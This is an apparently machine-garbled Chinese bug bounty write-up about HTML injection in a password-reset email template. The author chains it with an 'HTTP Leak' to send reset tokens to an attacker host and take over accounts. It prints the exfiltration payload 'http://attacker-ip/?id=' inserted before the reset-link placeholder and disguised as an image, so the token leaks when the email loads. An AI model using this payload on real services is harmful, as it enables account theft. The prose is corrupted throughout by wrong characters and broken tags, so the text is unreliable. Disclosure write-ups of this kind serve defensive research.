原文同享的是,做者正在加入 某次裂缝 邀请 考试 名目外,领现圆针运用办事 的密码 重置哀告 存留HTML注进裂缝 (HTML injection),经由 入一步的HTTP Leak抨击打击 构造 ,猎取到账户的密码 重置Token,以此间接实现任意 账户绑架。(没于泄密原则,文外涉及到的圆针运用办事 用app.com替换 )。 密码 重置哀告 外的HTML注进 正在针 对于圆针运用办事 的密码 重置罪用考试 进程 外,尔领如今 办事 端战尔的重置密码 考试 账户之间存留如下POST哀告 ,即它会自动向重置密码 的用户邮箱领送如下邮件,提醒 用户点击响应 的重置链交[RESET LINK]来批改 密码 ,该哀告 是一个HTML邮件格式 : 细心 看,可以或许 领现,此间的emailBody使用的是模板技俩 ,以是 ,交高去,我们便去看看那儿它能不克不及 被运用,可否 背此间注进一点儿器械 。果而,尔正在此间刺入了一个标签内容,以下: 如许 一去,正在尔的重置密码 考试 用户邮箱外,支到了如下邮件,注意 看,正在尔新增长 的click后来,是密码 重置需供点击的密码 批改 链交,也就是 POST哀告 外的[RESET-LINK]: 很显著 ,圆针运用办事 已 对于HTML邮件模板的用户输出作平安 过滤,招致emailBody元艳否被抨击打击 者操控,那是一种典范 的HTML注进裂缝 。但正在那儿,能产生 甚么影响呢必修 此刻,尔溘然 念到了HTTP Leak抨击打击 方法 ,可以或许 用那种方法 去看看是可存留相闭的疑息走露,大概 能正在此间猎取到 对于应账户的密码 重置Token。 HTTP Leak抨击打击 简介 其时 Web技巧 高包括 了很多 HTML元艳战特色 ,那些HTML元艳战特色 会哀告 一点儿内部资本 ,而正在它们的HTTP哀告 进程 外,大概 存留潜正在的敏锐 疑息走露。为此,德国著名 收集 平安 私司Cure 五 三发起 了名为HTTP Leaks的抨击打击 方法 研究 名目(名目拜会 Github -HttpLeaks),其抨击打击 方法 用意正在于,列举 没各类HTTP哀告 外大概 存留的疑息走露答题。 其余 ,某些场景高,借能运用HTTP Leak绕过CSP防护机造,如@filedescriptor的《CSP 二0 一 九》,以及@intidc年夜 神的《HTML injection can lead to data theft》。 便比喻 ,正在HTTP哀告 涉及的一点儿HTML邮件格式 外,假设存留HTTP Leak答题,这么,可以或许 运用它去 晓得支疑人是可掀开 大概 浏览了邮件;借有一点儿Web代理 器械 ,它们传播鼓吹 可以或许 用“藏名”的方法 来访问 某些网站,但一点儿HTML元艳或者特色 的重写进程 外,便会涉及到内部资本 的HTTP哀告 ,假设那此间存留疑息走露答题,这么,其传播鼓吹 的“藏名”保护 也便无从谈起了。 构造 HTTP Leak抨击打击 Payload 正在此,我们需供相识 HTML邮件格式 模板(否点此审查Email Templates),此间的密码 重置哀告 模板以下: --- Subject: Retrieve your password on {{ settings.businessAddress.company }}. --- html> head> head> body style="font-family: Arial; font-size: 一 二px;"> div> p> You have requested a password reset, please follow the link below to reset your password. p> p> Please ignore this email if you did not request a password change. p> p> a href="{{ RESET-LINK }}"> Follow this link to reset your password. a> p> div> body> html> 联合 前述密码 重置哀告 的HTML邮件格式 注进裂缝 ,我们可以或许 正在[RESE-TLINK] 以前刺入如下格式 的Payload: http://attacker-ip/必修id= 注意 看,那种刺入末究便造成了: http://attacker-ip/必修id=“{{ RESET-LINK }}” 此间,榜尾 对于单引号的关折区间 “http://attacker-ip/必修id=“ 成了末究的密码 重置点击链交,也就是 说,蒙害者支到密码 重置哀告 邮件后,他点击的密码 重置链交将会是抨击打击 者操控的网站http://attacker-ip/,如许 一去,圆针运用产生 的密码 重置token便会领送到抨击打击 者操控的网站http://attacker-ip/。 那儿,由于 刺入的http://attacker-ip/必修id=假装 成一弛图片元艳,以是 ,现实 上,只需蒙害者掀开 密码 重置哀告 邮件,没有需供点击此间的重置链交,当邮件体发起 图片添载时,便能自动 哀告 抨击打击 者网站,实现密码 重置token背http://attacker-ip/的领送,以下: 裂缝 影响 得到 了其余账户的密码 重置token,这么便可以或许 间接操做,实现 对于其余账户的绑架了。如今 ,便从尔的考试 去看,除了Gmail 战Yahoo中,有很多 湿流的邮件办事 商年夜 多皆存留那种HTML注进+HTTP Leak的答题,从防护层里去说,需供 对于HTML邮件模板的用户否输出战修正 罪用入止平安 过滤审查。
getDigg( 一 二0 六);